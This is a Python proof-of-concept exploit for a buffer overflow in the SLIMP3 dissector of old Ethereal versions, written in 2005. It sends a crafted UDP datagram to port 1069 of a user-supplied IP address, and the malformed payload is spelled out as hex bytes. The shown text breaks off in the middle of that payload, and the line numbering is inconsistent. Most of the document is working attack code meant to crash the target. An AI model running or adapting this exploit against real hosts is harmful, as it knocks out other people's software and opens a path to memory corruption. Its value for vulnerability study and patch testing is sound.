1 # ethereal_slimp3_bof.py
2 # Ethereal SLIMP3 Remote Buffer Overflow PoC
# Bug discovered by Vendor(?) 2005-10-19
4 # Coded by Sowhat
5 # http://secway.org
# 2005-10-20
# This PoC will crash Ethereal
8 # Tested with Ethereal 0.10.12, WinPcap 3.1 beta4, WinXP SP2
9 # For educational purpose only, Use at your own risk!
10
11 # Version 0.9.1 to 0.10.12
# http://www.ethereal.com/docs/release-notes/ethereal-0.10.13.html
13 # "The SLIMP3 dissector could overflow a buffer. "
14
15 import sys
16 import string
17 import socket
18
if len(sys.argv) != 2:
    # Wrong argument count: emit the banner and the usage text, then stop.
    # Output is byte-identical to printing each line separately.
    banner_lines = [
        " ##################################################################",
        " # #",
        " # Ethereal SLIMP3 Remote Buffer Overflow PoC #",
        " # Coded by Sowhat #",
        " # http://secway.org #",
        " ##################################################################",
        "\n Usage: " + sys.argv[0] + " TargetIP",
        " TargetIP should be any IP address Ethereal can reach",
    ]
    sys.stdout.write("\n".join(banner_lines) + "\n")
    sys.exit(0)
29
# Destination address for the crafted datagram: the IP given as the only
# command-line argument, paired with a hard-coded port.
# NOTE(review): 1069 is presumably the port the SLIMP3 dissector is
# registered on -- confirm against the dissector source.
host, port = sys.argv[1], 1069
victim = (host, port)
34
35 request = "\x6C\xC3\xB2\xA1\x02\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00"
36 request += "\xFF\xFF\x00\x00\x01\x00\x00\x00\x56\x57\xF7\x42\x5B\x6A\x04\x00"
37 request += "\x58\x01\x00\x00\x58\x01\x00\x00\x00\x04\x20\x04\x19\xA2\x00\x0C"
38 request += "\x6E\xE3\xB7\xC7\x08\x00\x45\x00\x01\x4A\xB4\x6C\x40\x00\x40\x11"
39 request += "\x03\x79\xC0\xA8\x00\x0A\xC0\xA8\x00\x63\x0D\x9B\x0D\x9B\x01\x36"
40 request += "\x83\x05\x6C\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
41 request += "\x20\x20\x20\x20\x02\x33\x02\x00\x02\x30\x03\x03\x02\x40\x03\x10"
42 request += "\x03\x10\x03\x10\x03\x10\x03\x10\x03\x10\x03\x10\x03\x00\x02\x58"
43 request += "\x03\x10\x03\x10\x03\x08\x03\x04\x03\x02\x03\x01\x03\x01\x03\x00"
44 request += "\x02\x60\x03\x7F\x03\x00\x03\x00\x03\x00\x03\x00\x03\x00\